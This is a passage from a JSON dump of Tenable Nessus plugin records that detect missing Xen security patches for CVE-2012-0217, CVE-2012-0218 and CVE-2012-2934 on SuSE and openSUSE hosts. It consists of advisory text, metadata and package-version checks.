'allow_unsafe' for GRUB\n which allows the host to start guests again.\n\n This is added to /boot/grub/menu.lst in the line looking\n like this :\n\n kernel /boot/xen.gz .... allow_unsafe\n\n Note: .... 
in this example represents the existing boot\n options for the host.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757537\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757970\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=764077\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-0217.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-0218.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-2934.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 6399.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-doc-pdf\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-kmp-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif 
(rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xen-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xen-kmp-default-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xen-kmp-pae-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xen-libs-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xen-tools-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xen-tools-domU-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xen-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xen-kmp-default-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xen-libs-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xen-tools-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xen-tools-domU-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-doc-html-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-doc-pdf-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-kmp-default-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-kmp-pae-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-kmp-trace-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif 
(rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-libs-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-tools-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-tools-domU-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-doc-html-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-doc-pdf-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-kmp-default-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-kmp-trace-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-libs-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-tools-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-tools-domU-4.0.3_21548_04-0.9.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:18:10", "description": "Three security issues were found in XEN.\n\nTwo security issues are fixed by this update :\n\n - Due to incorrect fault handling in the XEN hypervisor it\n was possible for a XEN guest domain administrator to\n execute code in the XEN host environment.\n (CVE-2012-0217)\n\n - Also a guest user could crash the guest XEN kernel due\n to a protection fault bounce. 
(CVE-2012-0218)\n\nThe third fix is changing the Xen behaviour on certain hardware :\n\n - The issue is a denial of service issue on older pre-SVM\n AMD CPUs (AMD Erratum 121). (CVE-2012-2934)\n\n AMD Erratum #121 is described in 'Revision Guide for AMD\n Athlon 64 and AMD Opteron Processors':\n http://support.amd.com/us/Processor_TechDocs/25759.pdf\n\n The following 130nm and 90nm (DDR1-only) AMD processors\n are subject to this erratum :\n\n - First-generation AMD-Opteron(tm) single and dual core\n processors in either 939 or 940 packages :\n\n - AMD Opteron(tm) 100-Series Processors\n\n - AMD Opteron(tm) 200-Series Processors\n\n - AMD Opteron(tm) 800-Series Processors\n\n - AMD Athlon(tm) processors in either 754, 939 or 940\n packages\n\n - AMD Sempron(tm) processor in either 754 or 939 packages\n\n - AMD Turion(tm) Mobile Technology in 754 package\n\n This issue does not affect Intel processors.\n\n The impact of this flaw is that a malicious PV guest\n user can halt the host system.\n\n As this is a hardware flaw, it is not fixable except by\n upgrading your hardware to a newer revision, or not\n allowing untrusted 64-bit guest systems.\n\n The patch changes the behaviour of the host system\n booting, which makes it unable to create guest machines\n until a specific boot option is set.\n\n There is a new XEN boot option 'allow_unsafe' for GRUB\n which allows the host to start guests again. Setting it\n does not fix the erratum, so an affected host that runs\n untrusted 64-bit PV guests remains exposed to the denial\n of service.\n\n This is added to /boot/grub/menu.lst in the line looking\n like this :\n\n kernel /boot/xen.gz .... allow_unsafe\n\n Note: .... 
in this example represents the existing boot\n options for the host.", "edition": 19, "published": "2012-06-13T00:00:00", "title": "SuSE 10 Security Update : Xen (ZYPP Patch Number 8180)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "modified": "2012-06-13T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_XEN-201206-8180.NASL", "href": "https://www.tenable.com/plugins/nessus/59469", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59469);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n\n script_name(english:\"SuSE 10 Security Update : Xen (ZYPP Patch Number 8180)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Three security issues were found in XEN.\n\nTwo security issues are fixed by this update :\n\n - Due to incorrect fault handling in the XEN hypervisor it\n was possible for a XEN guest domain administrator to\n execute code in the XEN host environment.\n (CVE-2012-0217)\n\n - Also a guest user could crash the guest XEN kernel due\n to a protection fault bounce. (CVE-2012-0218)\n\nThe third fix is changing the Xen behaviour on certain hardware :\n\n - The issue is a denial of service issue on older pre-SVM\n AMD CPUs (AMD Erratum 121). 
(CVE-2012-2934)\n\n AMD Erratum #121 is described in 'Revision Guide for AMD\n Athlon 64 and AMD Opteron Processors':\n http://support.amd.com/us/Processor_TechDocs/25759.pdf\n\n The following 130nm and 90nm (DDR1-only) AMD processors\n are subject to this erratum :\n\no\n\nFirst-generation AMD-Opteron(tm) single and dual core\nprocessors in either 939 or 940 packages :\n\n - AMD Opteron(tm) 100-Series Processors\n\n - AMD Opteron(tm) 200-Series Processors\n\n - AMD Opteron(tm) 800-Series Processors\n\n - AMD Athlon(tm) processors in either 754, 939 or 940\n packages\n\n - AMD Sempron(tm) processor in either 754 or 939 packages\n\n - AMD Turion(tm) Mobile Technology in 754 package This\n issue does not effect Intel processors.\n\n The impact of this flaw is that a malicious PV guest\n user can halt the host system.\n\n As this is a hardware flaw, it is not fixable except by\n upgrading your hardware to a newer revision, or not\n allowing untrusted 64bit guestsystems.\n\n The patch changes the behaviour of the host system\n booting, which makes it unable to create guest machines\n until a specific boot option is set.\n\n There is a new XEN boot option 'allow_unsafe' for GRUB\n which allows the host to start guests again.\n\n This is added to /boot/grub/menu.lst in the line looking\n like this :\n\n kernel /boot/xen.gz .... allow_unsafe\n\n Note: .... 
in this example represents the existing boot\n options for the host.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-0217.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-0218.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-2934.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 8180.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-devel-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-doc-html-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-doc-pdf-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-doc-ps-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-kmp-default-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-kmp-smp-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-libs-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-tools-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-tools-domU-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-tools-ioemu-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"i586\", reference:\"xen-kmp-bigsmp-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"xen-libs-32bit-3.2.3_17040_38-0.11.1\")) 
flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-devel-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-doc-html-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-doc-pdf-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-doc-ps-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-kmp-debug-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-kmp-default-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-kmp-kdump-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-kmp-smp-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-libs-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-tools-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-tools-domU-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-tools-ioemu-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"i586\", reference:\"xen-kmp-bigsmp-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"i586\", reference:\"xen-kmp-kdumppae-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"i586\", reference:\"xen-kmp-vmi-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"i586\", reference:\"xen-kmp-vmipae-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", 
reference:\"xen-libs-32bit-3.2.3_17040_38-0.11.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:25:19", "description": "This update of XEN fixed multiple security flaws that could be\nexploited by local attackers to cause a Denial of Service or\npotentially escalate privileges. Additionally, several other upstream\nchanges were backported.", "edition": 20, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : xen (openSUSE-SU-2012:0886-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:xen-doc-html", "p-cpe:/a:novell:opensuse:xen-devel", "cpe:/o:novell:opensuse:12.1", "p-cpe:/a:novell:opensuse:xen-kmp-desktop", "p-cpe:/a:novell:opensuse:xen-kmp-pae", "p-cpe:/a:novell:opensuse:xen", "p-cpe:/a:novell:opensuse:xen-tools-debuginfo", "p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:xen-doc-pdf", "p-cpe:/a:novell:opensuse:xen-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs", "p-cpe:/a:novell:opensuse:xen-tools-domU-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs-32bit", "p-cpe:/a:novell:opensuse:xen-debugsource", "p-cpe:/a:novell:opensuse:xen-tools", "p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:xen-tools-domU", "p-cpe:/a:novell:opensuse:xen-kmp-default", "p-cpe:/a:novell:opensuse:xen-libs-debuginfo-32bit"], "id": "OPENSUSE-2012-403.NASL", "href": "https://www.tenable.com/plugins/nessus/74682", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE 
Security Update openSUSE-2012-403.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74682);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n\n script_name(english:\"openSUSE Security Update : xen (openSUSE-SU-2012:0886-1)\");\n script_summary(english:\"Check for the openSUSE-2012-403 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of XEN fixed multiple security flaws that could be\nexploited by local attackers to cause a Denial of Service or\npotentially escalate privileges. Additionally, several other upstream\nchanges were backported.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757537\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757970\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=764077\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-07/msg00035.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", 
value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-doc-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-debugsource-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-devel-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", 
reference:\"xen-kmp-default-4.1.2_17_k3.1.10_1.16-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-kmp-default-debuginfo-4.1.2_17_k3.1.10_1.16-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-kmp-desktop-4.1.2_17_k3.1.10_1.16-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-kmp-desktop-debuginfo-4.1.2_17_k3.1.10_1.16-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-kmp-pae-4.1.2_17_k3.1.10_1.16-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-kmp-pae-debuginfo-4.1.2_17_k3.1.10_1.16-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-libs-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-libs-debuginfo-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-tools-domU-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", 